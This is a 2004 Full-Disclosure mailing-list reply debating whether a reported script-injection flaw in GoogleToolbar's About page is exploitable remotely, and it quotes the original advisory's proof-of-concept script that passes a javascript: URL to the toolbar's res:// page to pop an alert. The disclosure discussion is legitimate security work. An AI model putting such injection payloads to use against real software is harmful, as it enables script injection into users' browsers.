[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <414CE708.6080501@umbrella.name>
Date: Sun, 19 Sep 2004 09:55:20 +0800
From: Liu Die Yu <liudieyu@...rella.name>
To: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
Cc: bugtraq <bugtraq@...urityfocus.com>,
full-disclosure <full-disclosure@...ts.netsys.com>,
PenetrationTesting@...oogroups.com, pentest@...sg.org,
SecurITeam News <news@...uriteam.com>,
securitytracker <bugs@...uritytracker.com>,
vulnwatch <vulnwatch@...nwatch.org>, ViPeR <viper31337@...oo.co.in>
Subject: Re: GoogleToolbar:About -- Allows Script Injection
i agree with the-insider :-)
Rafel Ivgi, The-Insider wrote:
>This is not dangerous from remote, because the "res:" protocol is not
>accessible by internet zone. You must to find a way to access "res:" from
>remote, otherwise it means nothing. As for local zone, you can ran scripts
>in mycomputer zone.
>
>
>Rafel Ivgi, The-Insider
>Security Consultant, Finjan.com
>
>----- Original Message -----
>From: "ViPeR" <viper31337@...oo.co.in>
>To: <news@...uriteam.com>; <bugtraq@...urityfocus.com>;
><bugs@...uritytracker.com>; <vulnwatch@...nwatch.org>;
><vuln@...urity.nnov.ru>; <sec-adv@...unia.com>;
><submissions@...ketstormsecurity.org>
>Sent: Friday, September 17, 2004 10:51 AM
>Subject: GoogleToolbar:About -- Allows Script Injection
>
>
>Affection Software : GoogleToolbar
>Version : Tested on 2.0.114.1-big/en (GGLD)
>
>Notes:
>GoogleToolbar's About section allows injection of
>script, since it lacks any checking. The following
>code is a Proof Of Concept.
>
><s c r i p t>
>window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dl
>l/ABOUT.HTML",
>"<div style=\"background-image:
>url(javascript:alert(location.href));\">");
></s c r i p t>
>
>rgds,
>Gregory R. Panakkal / Viper
>
>
>________________________________________________________________________
>Yahoo! India Matrimony: Find your life partner online
>Go to: http://yahoo.shaadi.com/india-matrimony
>
>.
>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists